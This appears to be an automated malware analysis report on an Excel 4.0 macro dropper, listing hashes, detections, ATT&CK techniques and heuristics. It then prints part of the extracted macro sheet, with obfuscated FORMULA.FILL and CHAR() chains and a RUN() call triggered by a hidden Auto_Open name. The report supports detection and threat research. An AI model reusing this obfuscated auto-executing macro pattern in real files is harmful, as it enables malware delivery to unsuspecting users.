Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7605994bcee6cfdb…

MALICIOUS

Office (OLE)

Size: 174.5 KB
Created: 2020-05-13 11:32:42
Authoring application: Microsoft Excel
First seen: 2020-05-25
MD5: c708038070e2be66d3e126ecbd43885d
SHA-1: 9707403f866edabb3be973a07b0de510cf5f400f
SHA-256: 7605994bcee6cfdb9487152f058bdf19698c2db50c09ec135c7f97ef0d04dfd6
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains Excel 4.0 (XLM) macros, including an Auto_Open entry. The macros use dangerous functions such as RUN, indicating an intent to execute a secondary payload. The presence of an Auto_Open macro suggests the file was likely delivered as a spearphishing attachment.

Heuristics (4)

  • ClamAV: Xls.Dropper.Agent-7819203-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Dropper.Agent-7819203-0.
  • Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms that the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN)
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN)
    The workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 126013 bytes
SHA-256: 5e4ddbfc88045cb8eba4e2a450c3bfd865b8447f3cfd20f5a2dea5d5aa84dae1

Preview (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!JC3732 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,IW19,"",74.00000000000000000000
'  Sheet,HB52,"",2.34782508695652181174
'  Sheet,BU67,"",143.00000000000000000000
'  Sheet,BT98,"",54.75000000000000000000
'  Sheet,II206,"",2.94505494505494525015
'  Sheet,HU207,"",95.60007812499999602096
'  Sheet,BR312,"",265.00000000000000000000
'  Sheet,IR357,"",-0.05932203389830508627
'  Sheet,CO374,"",-234.00000000000000000000
'  Sheet,CS462,"",26.75000000000000000000
'  Sheet,BL486,"",-0.14285714285714284921
'  Sheet,FX501,"",3.22891566265060259155
'  Sheet,BA515,"",-1.81896551724137922612
'  Sheet,EI531,"",50.00000000000000000000
'  Sheet,HA599,"",-122.00000000000000000000
'  Sheet,JD604,"",-216.50000000000000000000
'  Sheet,FN759,"",-797.00000000000000000000
'  Sheet,EY815,"",247.50000000000000000000
'  Sheet,BA857,"",28.00000000000000000000
'  Sheet,W868,"",255.50000000000000000000
'  Sheet,BG913,"",3.04225352112676050709
'  Sheet,DM918,"FORMULA.FILL(CHAR(EE39213-CW19422)&CHAR(DD24911-IC29018)&CHAR(BN44843/DQ6127)&CHAR(C41016-FA20976)&CHAR(BN44843+CC2988)&CHAR(DH35863/EI1480)&CHAR(BN44843*BL486)&CHAR(BN44843*EO48290)&CHAR(C41016+GA21821)&CHAR(C41016+HQ35528)&CHAR(EE39213*EM27145)&CHAR(EE39213/Y2564)&CHAR(EE39213-IZ21853)&CHAR(FA61239+IB48810)&CHAR(BN44843*IO11297)&CHAR(FA61239-O48829)&CHAR(EE39213+IS57870)&CHAR(FX54190*BA25768)&CHAR(DD24911/FM24263)&CHAR(DH35863/BC28046)&CHAR(FX54190-FK49896)&CHAR(GR24435/IW54427)&CHAR(C41016+B35844)&CHAR(EE39213*GT46264)&CHAR(GR24435*CO47626)&CHAR(FA15861+FN759)&CHAR(GR24435/FT8445)&CHAR(GR24435-GM59038)&CHAR(DH35863-F64150)&CHAR(FA15861/GO48187)&CHAR(GR24435*IW20200)&CHAR(DH35863/JQ50139)&CHAR(FX54190+DJ11745)&CHAR(FA61239/BY56402)&CHAR(C41016-BT98)&CHAR(EE39213*GN45618)&CHAR(DH35863*DN8393)&CHAR(FA61239*CY15555)&CHAR(GR24435-IL42901)&CHAR(DH35863*IJ45983)&CHAR(DH35863-HY45980)&CHAR(FA15861+DX38091)&CHAR(BN44843*JL46926)&CHAR(FX54190+IE3498)&CHAR(FX54190-CQ40750)&CHAR(FA15861/IV33183)&CHAR(DD24911+CU45319)&CHAR(FA15861-FY33572)&CHAR(FA15861-S35515)&CHAR(HP39946*BC18661)&CHAR(EE39213+ER24767)&CHAR(DD24911+BO5482)&CHAR(FA15861/ED46740)&CHAR(BN44843+JP27242)&CHAR(BN44843/T36791)&CHAR(GR24435-GA50601)&CHAR(C41016-BL8670)&CHAR(FA61239-C26889)&CHAR(GR24435*BW34747)&CHAR(FX54190/K1799)&CHAR(FA15861+EF11613)&CHAR(DH35863-GQ10237)&CHAR(FA15861-FH48003)&CHAR(EE39213+HU207)&CHAR(DD24911*CS46040)&CHAR(FA15861*JI42580)&CHAR(GR24435*HO51363)&CHAR(DD24911-BM37705)&CHAR(FA61239*JM10609)&CHAR(DD24911+FL60376)&CHAR(FA61239*GS11938)&CHAR(FA15861-CI29651)&CHAR(GR24435+DZ55935)&CHAR(FA15861-K11240)&CHAR(C41016-BG60411)&CHAR(FA15861-GY31569)&CHAR(BN44843-IQ17435)&CHAR(FX54190/CK44021)&CHAR(FX54190+FX57107)&CHAR(FX54190/JT58256)&CHAR(BN44843+HY58152)&CHAR(FA61239*IB9135)&CHAR(EE39213/CL6448)&CHAR(C41016*HV49412)&CHAR(GR24435*GA8735)&CHAR(BN44843*GK24776),IV41589)",""
'  Sheet,DM919,RUN(HU64434),""
'  Sheet,IW970,"",-3.43564356435643558640
'  Sheet,JF1031,"",-0.52132701421800953234
'  Sheet,BI1090,"",-39.75000000000000000000
'  Sheet,Z1096,"",5.95555555555555571345
'  Sheet,JG1148,"",-24.25000000000000000000
'  Sheet,JA1153,"FORMULA.FILL(CHAR(DI48393/HU63951)&CHAR(W35809-O49530)&CHAR(HU39982+GY13355)&CHAR(DD29605/BY60382)&CHAR(JQ48790/BS44863)&CHAR(HU39982-HM45178)&CHAR(HU39982/GN15199)&CHAR(W35809/JE28205)&CHAR(JR9-FH8621)&CHAR(GB50993*HN1782)&CHAR(GB50993-FB34798)&CHAR(GB50993/HK24877)&CHAR(HU39982*DC9911)&CHAR(JR9-T48065)&CHAR(HU39982/DU46490)&CHAR(JR9*IP60212)&CHAR(GB50993-EJ23447)&CHAR(DD29605/IV32643)&CHAR(DI48393+FJ11983)&CHAR(GG13989*GD4688)&CHAR(JQ48790-BT51503)&CHAR(DI48393/DV2511)&CHAR(JR9-CZ17910)&CHAR(L38910+FH1796)&CHAR(L38910+EX28495)&CHAR(JQ48790+HB41735)&CHAR(JQ4
... (truncated)